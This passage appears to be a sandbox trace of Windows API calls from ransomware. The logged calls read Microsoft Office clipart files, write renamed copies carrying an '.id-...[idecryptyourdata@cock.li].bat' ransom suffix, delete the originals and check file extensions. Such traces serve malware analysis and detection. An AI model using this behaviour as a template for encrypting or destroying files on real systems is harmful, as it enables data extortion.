dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0063.653] GetLastError () returned 0x0 [0063.653] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x9fc, lpOverlapped=0x0) returned 1 [0063.664] WriteFile (in: hFile=0x384, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xa00, lpOverlapped=0x0) returned 1 [0063.665] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.665] WriteFile (in: hFile=0x384, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.665] SetEndOfFile (hFile=0x384) returned 1 [0063.667] CloseHandle (hObject=0x384) returned 1 [0063.667] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.668] SetEndOfFile (hFile=0x370) returned 1 [0063.669] CloseHandle (hObject=0x370) returned 1 [0063.669] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.669] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00262_.wmf")) returned 1 [0063.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 68 [0063.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 68 [0063.670] lstrlenW (lpString=".doc") returned 4 [0063.670] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.670] lstrlenW (lpString=".docx") returned 5 [0063.670] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.670] lstrlenW (lpString=".pdf") returned 4 [0063.670] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.670] lstrlenW (lpString=".xls") returned 4 [0063.670] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.670] lstrlenW (lpString=".xlsx") returned 5 [0063.670] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.670] lstrlenW (lpString=".ppt") returned 4 [0063.670] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 68 [0063.670] lstrlenW (lpString=".zip") returned 4 [0063.670] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.670] lstrlenW (lpString=".rar") returned 4 [0063.670] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.670] lstrlenW (lpString=".bz2") returned 4 [0063.670] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.670] lstrlenW (lpString=".7z") returned 3 [0063.670] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 68 [0063.670] lstrlenW (lpString=".dbf") returned 4 [0063.670] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 68 [0063.670] lstrlenW (lpString=".1cd") returned 4 [0063.670] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 68 [0063.670] lstrlenW (lpString=".jpg") returned 4 [0063.670] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 68 [0063.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 68 [0063.671] lstrlenW (lpString=".doc") returned 4 [0063.671] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.671] lstrlenW (lpString=".docx") returned 5 [0063.671] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.671] lstrlenW (lpString=".pdf") returned 4 [0063.671] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.671] lstrlenW (lpString=".xls") returned 4 [0063.671] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.671] lstrlenW (lpString=".xlsx") returned 5 [0063.671] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.671] lstrlenW (lpString=".ppt") returned 4 [0063.671] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 68 [0063.671] lstrlenW (lpString=".zip") returned 4 [0063.671] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.671] lstrlenW (lpString=".rar") returned 4 [0063.671] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.671] lstrlenW (lpString=".bz2") returned 4 [0063.671] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.671] lstrlenW (lpString=".7z") returned 3 [0063.671] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 68 [0063.671] lstrlenW (lpString=".dbf") returned 4 [0063.671] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 68 [0063.671] lstrlenW (lpString=".1cd") returned 4 [0063.671] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 68 [0063.671] lstrlenW (lpString=".jpg") returned 4 [0063.671] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.672] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0063.672] lstrlenW (lpString="BL00269_.WMF") returned 12 [0063.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00269_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0063.672] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=5272) returned 1 [0063.672] CloseHandle (hObject=0x370) returned 1 [0063.672] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00269_.wmf")) returned 0x220 [0063.672] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00269_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0063.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00269_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0063.672] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.672] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00269_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0063.673] GetLastError () returned 0x0 [0063.673] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x1498, lpOverlapped=0x0) returned 1 [0063.674] WriteFile (in: hFile=0x358, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x14a0, lpOverlapped=0x0) returned 1 [0063.675] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.675] WriteFile (in: hFile=0x358, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.675] SetEndOfFile (hFile=0x358) returned 1 [0063.675] CloseHandle (hObject=0x358) returned 1 [0063.676] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.676] SetEndOfFile (hFile=0x370) returned 1 [0063.677] CloseHandle (hObject=0x370) returned 1 [0063.677] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.677] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00269_.wmf")) returned 1 [0063.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 68 [0063.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 68 [0063.677] lstrlenW (lpString=".doc") returned 4 [0063.677] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.677] lstrlenW (lpString=".docx") returned 5 [0063.677] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.677] lstrlenW (lpString=".pdf") returned 4 [0063.678] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.678] lstrlenW (lpString=".xls") returned 4 [0063.678] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.678] lstrlenW (lpString=".xlsx") returned 5 [0063.678] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.678] lstrlenW (lpString=".ppt") returned 4 [0063.678] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 68 [0063.678] lstrlenW (lpString=".zip") returned 4 [0063.678] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.678] lstrlenW (lpString=".rar") returned 4 [0063.678] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.678] lstrlenW (lpString=".bz2") returned 4 [0063.678] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.678] lstrlenW (lpString=".7z") returned 3 [0063.678] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 68 [0063.678] lstrlenW (lpString=".dbf") returned 4 [0063.678] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 68 [0063.678] lstrlenW (lpString=".1cd") returned 4 [0063.678] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 68 [0063.678] lstrlenW (lpString=".jpg") returned 4 [0063.678] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 68 [0063.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 68 [0063.678] lstrlenW (lpString=".doc") returned 4 [0063.678] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.678] lstrlenW (lpString=".docx") returned 5 [0063.678] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.678] lstrlenW (lpString=".pdf") returned 4 [0063.678] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.678] lstrlenW (lpString=".xls") returned 4 [0063.678] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.679] lstrlenW (lpString=".xlsx") returned 5 [0063.679] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.679] lstrlenW (lpString=".ppt") returned 4 [0063.679] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 68 [0063.679] lstrlenW (lpString=".zip") returned 4 [0063.679] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.679] lstrlenW (lpString=".rar") returned 4 [0063.679] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.679] lstrlenW (lpString=".bz2") returned 4 [0063.679] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.679] lstrlenW (lpString=".7z") returned 3 [0063.679] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 68 [0063.679] lstrlenW (lpString=".dbf") returned 4 [0063.679] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 68 [0063.679] lstrlenW (lpString=".1cd") returned 4 [0063.679] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 68 [0063.679] lstrlenW (lpString=".jpg") returned 4 [0063.679] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.679] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0063.679] lstrlenW (lpString="BL00270_.WMF") returned 12 [0063.679] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00270_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0063.680] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=3016) returned 1 [0063.680] CloseHandle (hObject=0x370) returned 1 [0063.680] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00270_.wmf")) returned 0x220 [0063.680] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00270_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0063.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00270_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0063.680] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.680] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00270_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0063.680] GetLastError () returned 0x0 [0063.680] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xbc8, lpOverlapped=0x0) returned 1 [0063.743] WriteFile (in: hFile=0x358, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xbd0, lpOverlapped=0x0) returned 1 [0063.744] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.744] WriteFile (in: hFile=0x358, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.744] SetEndOfFile (hFile=0x358) returned 1 [0063.744] CloseHandle (hObject=0x358) returned 1 [0063.745] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.745] SetEndOfFile (hFile=0x370) returned 1 [0063.746] CloseHandle (hObject=0x370) returned 1 [0063.746] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.746] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00270_.wmf")) returned 1 [0063.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 68 [0063.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 68 [0063.746] lstrlenW (lpString=".doc") returned 4 [0063.746] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.747] lstrlenW (lpString=".docx") returned 5 [0063.747] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.747] lstrlenW (lpString=".pdf") returned 4 [0063.747] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.747] lstrlenW (lpString=".xls") returned 4 [0063.747] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.747] lstrlenW (lpString=".xlsx") returned 5 [0063.747] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.747] lstrlenW (lpString=".ppt") returned 4 [0063.747] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 68 [0063.747] lstrlenW (lpString=".zip") returned 4 [0063.747] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.747] lstrlenW (lpString=".rar") returned 4 [0063.747] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.747] lstrlenW (lpString=".bz2") returned 4 [0063.747] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.747] lstrlenW (lpString=".7z") returned 3 [0063.747] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 68 [0063.747] lstrlenW (lpString=".dbf") returned 4 [0063.747] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 68 [0063.747] lstrlenW (lpString=".1cd") returned 4 [0063.747] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 68 [0063.747] lstrlenW (lpString=".jpg") returned 4 [0063.747] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 68 [0063.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 68 [0063.747] lstrlenW (lpString=".doc") returned 4 [0063.748] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.748] lstrlenW (lpString=".docx") returned 5 [0063.748] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.748] lstrlenW (lpString=".pdf") returned 4 [0063.748] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.748] lstrlenW (lpString=".xls") returned 4 [0063.748] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.748] lstrlenW (lpString=".xlsx") returned 5 [0063.748] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.748] lstrlenW (lpString=".ppt") returned 4 [0063.748] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.748] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 68 [0063.748] lstrlenW (lpString=".zip") returned 4 [0063.748] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.748] lstrlenW (lpString=".rar") returned 4 [0063.748] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.748] lstrlenW (lpString=".bz2") returned 4 [0063.748] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.748] lstrlenW (lpString=".7z") returned 3 [0063.748] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.748] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 68 [0063.748] lstrlenW (lpString=".dbf") returned 4 [0063.748] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.748] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 68 [0063.748] lstrlenW (lpString=".1cd") returned 4 [0063.748] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.748] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 68 [0063.748] lstrlenW (lpString=".jpg") returned 4 [0063.748] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.749] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0063.749] lstrlenW (lpString="BL00273_.WMF") returned 12 [0063.749] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00273_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0063.749] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=3780) returned 1 [0063.749] CloseHandle (hObject=0x370) returned 1 [0063.749] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00273_.wmf")) returned 0x220 [0063.749] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00273_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0063.749] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00273_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0063.749] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.749] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.749] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00273_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0063.750] GetLastError () returned 0x0 [0063.750] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xec4, 